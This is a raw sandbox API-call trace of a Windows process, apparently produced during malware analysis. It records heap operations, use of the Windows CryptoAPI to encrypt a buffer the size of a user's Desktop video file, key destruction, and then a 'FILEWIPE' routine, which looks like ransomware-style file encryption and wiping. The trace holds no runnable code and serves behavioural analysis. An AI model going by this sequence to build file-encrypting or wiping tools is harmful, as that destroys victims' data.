(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0162.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.179] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0162.179] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27b8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27b8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.181] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.181] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.181] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.183] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf55d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf560) returned 1 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0162.183] CharLowerBuffW (in: lpsz="byte[62817]", cchLength=0xb | out: lpsz="byte[62817]") returned 0xb [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0162.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0162.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.186] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa48008*, pdwDataLen=0x87e820*=0xf55d, dwBufLen=0xf560 | out: pbData=0xa48008*, pdwDataLen=0x87e820*=0xf560) returned 1 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0162.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.232] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.242] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0162.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0162.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.243] CryptDestroyKey (hKey=0x90aed8) returned 1 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.243] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.243] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.243] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.244] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0162.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.244] FreeLibrary (hLibModule=0x74f20000) returned 1 [0162.248] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0162.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0x90ae18 [0162.248] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0162.249] CharLowerBuffW (in: lpsz="byte[62813]", cchLength=0xb | out: lpsz="byte[62813]") returned 0xb [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.250] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 